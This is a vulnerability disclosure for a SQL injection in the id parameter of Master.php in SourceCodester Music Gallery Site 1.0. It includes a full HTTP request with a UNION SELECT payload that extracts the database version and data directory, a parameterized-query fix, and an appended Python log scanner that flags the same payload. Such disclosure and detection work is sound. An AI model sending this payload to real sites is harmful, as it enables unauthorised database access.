Submit #92640: SOURCECODESTER Music Gallery Site 1.0 / Master.php id SQL Injection

Title: SOURCECODESTER Music Gallery Site 1.0 / Master.php id SQL Injection
Description: Music Gallery Site: Any remote hacker can access the Master.php?f=get_music_details&id=* URL and inject malicious SQL through the id parameter, which is supplied in the GET request.

Author Email: [email protected]
Vendor Homepage: https://www.sourcecodester.com
Software Link: https://www.sourcecodester.com/php/16073/music-gallery-site-using-php-and-mysql-database-free-source-code.html
Version: v 1.0

Vulnerable URL:
- URL: php-music/classes/Master.php?f=get_music_details&id=*

Affected Page:
- Master.php
- On this page, the id parameter of "get_music_details" is vulnerable to SQL injection.
- URL of the vulnerable parameter: php-music/classes/Master.php?f=get_music_details&id=*

Description: The Music Gallery Site has public pages for the music library. Whenever someone clicks the play button on any music, a popup appears on the same page. On the backend, the server calls the file Master.php; in that file, "get_music_details" runs the music, and the id parameter this function reads from the GET request is vulnerable to SQL injection.

Proof of Concept:
The following steps are involved:
1. Go to the music list and click the play button of any music.
2. Intercept the traffic through Burp and get the actual URL.
3. In the URL, there is a parameter 'id' which is vulnerable to SQL injection (Master.php?f=get_music_details&id=1*).

Request:

    GET /php-music/classes/Master.php?f=get_music_details&id=1%27+and+false+union+select+1,version(),@@datadir,4,5,6,7,8,9,10,11--+- HTTP/1.1
    Host: localhost
    Cache-Control: max-age=0
    sec-ch-ua: "Not?A_Brand";v="8", "Chromium";v="108"
    sec-ch-ua-mobile: ?0
    sec-ch-ua-platform: "Linux"
    Upgrade-Insecure-Requests: 1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.125 Safari/537.36
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
    Sec-Fetch-Site: none
    Sec-Fetch-Mode: navigate
    Sec-Fetch-User: ?1
    Sec-Fetch-Dest: document
    Accept-Encoding: gzip, deflate
    Accept-Language: en-US,en;q=0.9
    Cookie: PHPSESSID=a5fd11866a86264db3a68bb1817b2c7f
    Connection: close

Response: Any remote attacker can access full system through SQL Injection

Recommendation: Whoever uses this CMS should update the application code to use parameterized queries to avoid SQL injection attacks.

Example Code:

    // Prepare the statement with a named placeholder instead of concatenating $id
    $sql = $obj_admin->db->prepare("SELECT * FROM `music_list` where `id` = :id");
    // Bind the request value as data so it is never parsed as SQL
    $sql->bindParam(':id', $id);
    $sql->execute();
    $row = $sql->fetch(PDO::FETCH_ASSOC);
Source: https://github.com/navaidzansari/CVE_Demo/blob/main/2023/Music%20Gallery%20Site%20-%20SQL%20Injection%203.md
User: navaidansari (UID 41266)
Submission: 02/21/2023 13:06 (3 years ago)
Moderation: 02/22/2023 19:12 (1 day later)
Status: Accepted
VulDB entry: 221632 [SourceCodester Music Gallery Site 1.0 GET Request Master.php ID sql injection]
Points: 20
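
A defender-side check for the request pattern in the description, as an added example that is not part of the original submission: it scans web access logs for calls to Master.php?f=get_music_details whose id is not a plain integer. The log lines are constructed, and the combined log format, the function names and the IP addresses are assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed access-log lines (combined log format assumed); the second
# one carries the request shown in the description above.
SAMPLE_LOG = [
    '192.0.2.10 - - [21/Feb/2023:13:01:02 +0000] "GET /php-music/classes/Master.php?f=get_music_details&id=7 HTTP/1.1" 200 512',
    '192.0.2.44 - - [21/Feb/2023:13:02:10 +0000] "GET /php-music/classes/Master.php?f=get_music_details&id=1%27+and+false+union+select+1,version(),@@datadir,4,5,6,7,8,9,10,11--+- HTTP/1.1" 200 498',
    '192.0.2.10 - - [21/Feb/2023:13:03:00 +0000] "GET /php-music/classes/Master.php?f=get_music_details&id=%31%32 HTTP/1.1" 200 530',
    '192.0.2.10 - - [21/Feb/2023:13:03:30 +0000] "GET /php-music/index.php?id=abc HTTP/1.1" 200 900',
]

# Client address and request target from one log line.
REQUEST_RE = re.compile(r'^(?P<ip>\S+) .*?"[A-Z]+ (?P<target>\S+) HTTP/[\d.]+"')
INTEGER_RE = re.compile(r"[0-9]+")


def suspicious_id(target):
    """Return the decoded id value when a request to the affected function
    carries an id that is not a plain integer, otherwise None."""
    url = urlsplit(target)
    if not url.path.endswith("/classes/Master.php"):
        return None
    # parse_qs percent-decodes values, so encoded digits are not flagged.
    params = parse_qs(url.query, keep_blank_values=True)
    if "get_music_details" not in params.get("f", []):
        return None
    for value in params.get("id", []):
        if not INTEGER_RE.fullmatch(value):
            return value
    return None


def scan(lines):
    """Return (client_ip, decoded_id) for every flagged log line."""
    hits = []
    for line in lines:
        match = REQUEST_RE.match(line)
        if not match:
            continue
        value = suspicious_id(match.group("target"))
        if value is not None:
            hits.append((match.group("ip"), value))
    return hits


if __name__ == "__main__":
    for ip, value in scan(SAMPLE_LOG):
        print(f"{ip} sent non-integer id: {value!r}")
```

The same integer-only rule can be enforced in the application before the query runs, in addition to the parameterized query recommended above.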
